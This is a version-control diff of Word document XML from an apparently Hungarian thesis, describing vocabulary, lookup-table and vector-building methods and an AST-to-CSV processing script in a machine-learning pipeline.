+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) és a kimeneti vektoroknak egy-egy változó (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>X, y</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>collectVocab</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">etódus, ami </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> teszi a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0.oszlopá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nak szavait </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>előfordulási szám</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>uk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>at, utóbbi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szerint csökkenő sorrendben.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>createLookupTables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>etódus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, ami </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word2index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">változóba teszi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word_freqs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szavait</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sorrendnek megfelelően </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2-től </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>indexelve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> egy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-egy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>indexet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> társít hozzájuk</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nulladik és első index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a *** és ismeretlen szavakhoz van fenntartva</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">word2index </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">index, az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>index2word-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>be pedig index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>value</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>formában kerülnek be a szavak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az indexükkel.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Listaszerbekezds"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="29"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1134" w:hanging="283"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>createVectors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Metódus, ami ciklussal végigmegy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">egyrészt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>0.oszlopának</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> szavain, és a hozzájuk tartozó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>word2indenx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-beli</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> indexet </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">X </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> gyűjti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>. Ennek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hosszát később módosítja a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>max_length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">változóban </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>megadottra, így a vektorok hossza egységes marad.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Másrészt a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dataset</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1.oszlopának bináris számain is, amiket pedig az </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">y </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>változóba tesz.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="1134"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15353,10 +19198,10 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67F1A32B" wp14:editId="3C0D88AE">
-            <wp:extent cx="3791145" cy="1847945"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="10" name="Kép 10"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF0CC3C" wp14:editId="4CD7F8BB">
+            <wp:extent cx="3784795" cy="1892397"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="23" name="Kép 23"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -15376,1765 +19221,6 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3791145" cy="1847945"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-es </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ábra: pdo1_ast.txt</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 3.1-es ábra kódjának AST megfelelője</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nodes</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.py </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ezekkel dolgozik tovább</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Elsőként listázza és egy ciklussal sorra </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">beolvassa </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST mappa</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> .txt kiterjesztésű fájljait</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>. M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ajd </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ezek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>JSON felépítésű fájlok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nak a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sorait kulcsok alapján szelektálja</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> („kind”, „name”, „raw”)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ezek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z értéke</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>adják a fájlok fontos szavait és kifejezéseit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, így </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>azonos nevű .csv kiterjesztésű fájlok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> első oszlop</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>aiba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> írja</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>az értékeket</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>listá</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>k</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ba fűzve.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Az oszlopokat ’^’ karakter választja el.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D80A38E" wp14:editId="1B0F2926">
-            <wp:extent cx="5156465" cy="495325"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="15" name="Kép 15"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5156465" cy="495325"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>3.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
